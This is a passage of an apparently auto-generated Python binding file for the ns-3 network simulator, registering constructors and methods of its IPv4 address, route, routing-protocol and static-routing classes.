ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForPrefix(ns3::Ipv4Address address, ns3::Ipv4Mask mask) const [member function] cls.add_method('GetInterfaceForPrefix', 'int32_t', 
[param('ns3::Ipv4Address', 'address'), param('ns3::Ipv4Mask', 'mask')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMetric(uint32_t interface) const [member function] cls.add_method('GetMetric', 'uint16_t', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMtu(uint32_t interface) const [member function] cls.add_method('GetMtu', 'uint16_t', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNAddresses(uint32_t interface) const [member function] cls.add_method('GetNAddresses', 'uint32_t', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNInterfaces() const [member function] cls.add_method('GetNInterfaces', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4::GetNetDevice(uint32_t interface) [member function] cls.add_method('GetNetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4::GetProtocol(int protocolNumber) const [member function] cls.add_method('GetProtocol', 'ns3::Ptr< ns3::IpL4Protocol >', [param('int', 'protocolNumber')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4::GetProtocol(int protocolNumber, int32_t interfaceIndex) const [member function] cls.add_method('GetProtocol', 'ns3::Ptr< ns3::IpL4Protocol >', [param('int', 'protocolNumber'), param('int32_t', 'interfaceIndex')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4::GetRoutingProtocol() const [member 
function] cls.add_method('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): static ns3::TypeId ns3::Ipv4::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function] cls.add_method('Insert', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol, uint32_t interfaceIndex) [member function] cls.add_method('Insert', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol'), param('uint32_t', 'interfaceIndex')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function] cls.add_method('IsDestinationAddress', 'bool', [param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsForwarding(uint32_t interface) const [member function] cls.add_method('IsForwarding', 'bool', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsUp(uint32_t interface) const [member function] cls.add_method('IsUp', 'bool', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Remove(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function] cls.add_method('Remove', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Remove(ns3::Ptr<ns3::IpL4Protocol> protocol, uint32_t interfaceIndex) [member function] cls.add_method('Remove', 'void', [param('ns3::Ptr< 
ns3::IpL4Protocol >', 'protocol'), param('uint32_t', 'interfaceIndex')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, uint32_t addressIndex) [member function] cls.add_method('RemoveAddress', 'bool', [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, ns3::Ipv4Address address) [member function] cls.add_method('RemoveAddress', 'bool', [param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function] cls.add_method('SelectSourceAddress', 'ns3::Ipv4Address', [param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function] cls.add_method('Send', 'void', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function] cls.add_method('SendWithHeader', 'void', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')], is_pure_virtual=True, is_virtual=True) ## ipv4.h 
(module 'internet'): void ns3::Ipv4::SetDown(uint32_t interface) [member function] cls.add_method('SetDown', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetForwarding(uint32_t interface, bool val) [member function] cls.add_method('SetForwarding', 'void', [param('uint32_t', 'interface'), param('bool', 'val')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetMetric(uint32_t interface, uint16_t metric) [member function] cls.add_method('SetMetric', 'void', [param('uint32_t', 'interface'), param('uint16_t', 'metric')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function] cls.add_method('SetRoutingProtocol', 'void', [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetUp(uint32_t interface) [member function] cls.add_method('SetUp', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SourceAddressSelection(uint32_t interface, ns3::Ipv4Address dest) [member function] cls.add_method('SourceAddressSelection', 'ns3::Ipv4Address', [param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'dest')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4::IF_ANY [variable] cls.add_static_attribute('IF_ANY', 'uint32_t const', is_const=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::GetIpForward() const [member function] cls.add_method('GetIpForward', 'bool', [], is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::GetWeakEsModel() const [member function] cls.add_method('GetWeakEsModel', 'bool', [], is_pure_virtual=True, is_const=True, 
visibility='private', is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetIpForward(bool forward) [member function] cls.add_method('SetIpForward', 'void', [param('bool', 'forward')], is_pure_virtual=True, visibility='private', is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetWeakEsModel(bool model) [member function] cls.add_method('SetWeakEsModel', 'void', [param('bool', 'model')], is_pure_virtual=True, visibility='private', is_virtual=True) return def register_Ns3Ipv4AddressChecker_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')]) return def register_Ns3Ipv4AddressValue_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'value')]) ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], 
is_virtual=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv4Address const &', 'value')]) return def register_Ns3Ipv4MaskChecker_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')]) return def register_Ns3Ipv4MaskValue_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')]) ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] 
cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv4Mask', [], is_const=True) ## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv4Mask const &', 'value')]) return def register_Ns3Ipv4MulticastRoute_methods(root_module, cls): ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute(ns3::Ipv4MulticastRoute const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MulticastRoute const &', 'arg0')]) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute() [constructor] cls.add_constructor([]) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetGroup() const [member function] cls.add_method('GetGroup', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetOrigin() const [member function] cls.add_method('GetOrigin', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): std::map<unsigned int, unsigned int, std::less<unsigned int>, std::allocator<std::pair<unsigned int const, unsigned int> > > ns3::Ipv4MulticastRoute::GetOutputTtlMap() const [member function] cls.add_method('GetOutputTtlMap', 'std::map< unsigned int, unsigned int >', [], is_const=True) ## ipv4-route.h (module 'internet'): uint32_t ns3::Ipv4MulticastRoute::GetParent() const [member 
function] cls.add_method('GetParent', 'uint32_t', [], is_const=True) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetGroup(ns3::Ipv4Address const group) [member function] cls.add_method('SetGroup', 'void', [param('ns3::Ipv4Address const', 'group')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOrigin(ns3::Ipv4Address const origin) [member function] cls.add_method('SetOrigin', 'void', [param('ns3::Ipv4Address const', 'origin')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOutputTtl(uint32_t oif, uint32_t ttl) [member function] cls.add_method('SetOutputTtl', 'void', [param('uint32_t', 'oif'), param('uint32_t', 'ttl')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetParent(uint32_t iif) [member function] cls.add_method('SetParent', 'void', [param('uint32_t', 'iif')]) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_INTERFACES [variable] cls.add_static_attribute('MAX_INTERFACES', 'uint32_t const', is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_TTL [variable] cls.add_static_attribute('MAX_TTL', 'uint32_t const', is_const=True) return def register_Ns3Ipv4Route_methods(root_module, cls): cls.add_output_stream_operator() ## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route(ns3::Ipv4Route const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Route const &', 'arg0')]) ## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route() [constructor] cls.add_constructor([]) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetDestination() const [member function] cls.add_method('GetDestination', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetGateway() const [member function] cls.add_method('GetGateway', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ptr<ns3::NetDevice> 
ns3::Ipv4Route::GetOutputDevice() const [member function] cls.add_method('GetOutputDevice', 'ns3::Ptr< ns3::NetDevice >', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetSource() const [member function] cls.add_method('GetSource', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetDestination(ns3::Ipv4Address dest) [member function] cls.add_method('SetDestination', 'void', [param('ns3::Ipv4Address', 'dest')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetGateway(ns3::Ipv4Address gw) [member function] cls.add_method('SetGateway', 'void', [param('ns3::Ipv4Address', 'gw')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetOutputDevice(ns3::Ptr<ns3::NetDevice> outputDevice) [member function] cls.add_method('SetOutputDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'outputDevice')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetSource(ns3::Ipv4Address src) [member function] cls.add_method('SetSource', 'void', [param('ns3::Ipv4Address', 'src')]) return def register_Ns3Ipv4RoutingProtocol_methods(root_module, cls): ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol() [constructor] cls.add_constructor([]) ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol(ns3::Ipv4RoutingProtocol const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4RoutingProtocol const &', 'arg0')]) ## ipv4-routing-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4RoutingProtocol::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 
'address')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): bool ns3::Ipv4RoutingProtocol::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned 
int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], 
is_pure_virtual=True, is_virtual=True) return def register_Ns3Ipv4StaticRouting_methods(root_module, cls): ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4StaticRouting::Ipv4StaticRouting(ns3::Ipv4StaticRouting const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4StaticRouting const &', 'arg0')]) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4StaticRouting::Ipv4StaticRouting() [constructor] cls.add_constructor([]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddHostRouteTo(ns3::Ipv4Address dest, ns3::Ipv4Address nextHop, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddHostRouteTo', 'void', [param('ns3::Ipv4Address', 'dest'), param('ns3::Ipv4Address', 'nextHop'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddHostRouteTo(ns3::Ipv4Address dest, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddHostRouteTo', 'void', [param('ns3::Ipv4Address', 'dest'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddMulticastRoute(ns3::Ipv4Address origin, ns3::Ipv4Address group, uint32_t inputInterface, std::vector<unsigned int, std::allocator<unsigned int> > outputInterfaces) [member function] cls.add_method('AddMulticastRoute', 'void', [param('ns3::Ipv4Address', 'origin'), param('ns3::Ipv4Address', 'group'), param('uint32_t', 'inputInterface'), param('std::vector< unsigned int >', 'outputInterfaces')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddNetworkRouteTo(ns3::Ipv4Address network, ns3::Ipv4Mask networkMask, ns3::Ipv4Address nextHop, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddNetworkRouteTo', 'void', [param('ns3::Ipv4Address', 'network'), param('ns3::Ipv4Mask', 'networkMask'), 
param('ns3::Ipv4Address', 'nextHop'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddNetworkRouteTo(ns3::Ipv4Address network, ns3::Ipv4Mask networkMask, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddNetworkRouteTo', 'void', [param('ns3::Ipv4Address', 'network'), param('ns3::Ipv4Mask', 'networkMask'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4RoutingTableEntry ns3::Ipv4StaticRouting::GetDefaultRoute() [member function] cls.add_method('GetDefaultRoute', 'ns3::Ipv4RoutingTableEntry', []) ## ipv4-static-routing.h (module 'internet'): uint32_t ns3::Ipv4StaticRouting::GetMetric(uint32_t index) const [member function] cls.add_method('GetMetric', 'uint32_t', [param('uint32_t', 'index')], is_const=True) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4MulticastRoutingTableEntry ns3::Ipv4StaticRouting::GetMulticastRoute(uint32_t i) const [member function] cls.add_method('GetMulticastRoute', 'ns3::Ipv4MulticastRoutingTableEntry', [param('uint32_t', 'i')], is_const=True) ## ipv4-static-routing.h (module 'internet'): uint32_t ns3::Ipv4StaticRouting::GetNMulticastRoutes() const [member function] cls.add_method('GetNMulticastRoutes', 'uint32_t', [], is_const=True) ## ipv4-static-routing.h (module 'internet'): uint32_t ns3::Ipv4StaticRouting::GetNRoutes() const [member function] cls.add_method('GetNRoutes', 'uint32_t', [], is_const=True) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4RoutingTableEntry ns3::Ipv4StaticRouting::GetRoute(uint32_t i) const [member function] cls.add_method('GetRoute', 'ns3::Ipv4RoutingTableEntry', [param('uint32_t', 'i')], is_const=True) ## ipv4-static-routing.h (module 'internet'): static ns3::TypeId ns3::Ipv4StaticRouting::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], 
is_static=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_const=True, is_virtual=True) ## ipv4-static-routing.h (module 'internet'): bool ns3::Ipv4StaticRouting::RemoveMulticastRoute(ns3::Ipv4Address origin, ns3::Ipv4Address group, uint32_t inputInterface) [member function] cls.add_method('RemoveMulticastRoute', 'bool', [param('ns3::Ipv4Address', 'origin'), param('ns3::Ipv4Address', 'group'), param('uint32_t', 'inputInterface')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::RemoveMulticastRoute(uint32_t index) [member function] 
cls.add_method('RemoveMulticastRoute', 'void', [param('uint32_t', 'index')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::RemoveRoute(uint32_t i) [member function] cls.add_method('RemoveRoute', 'void', [param('uint32_t', 'i')]) ## ipv4-static-routing.h (module 'internet'): bool ns3::Ipv4StaticRouting::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] 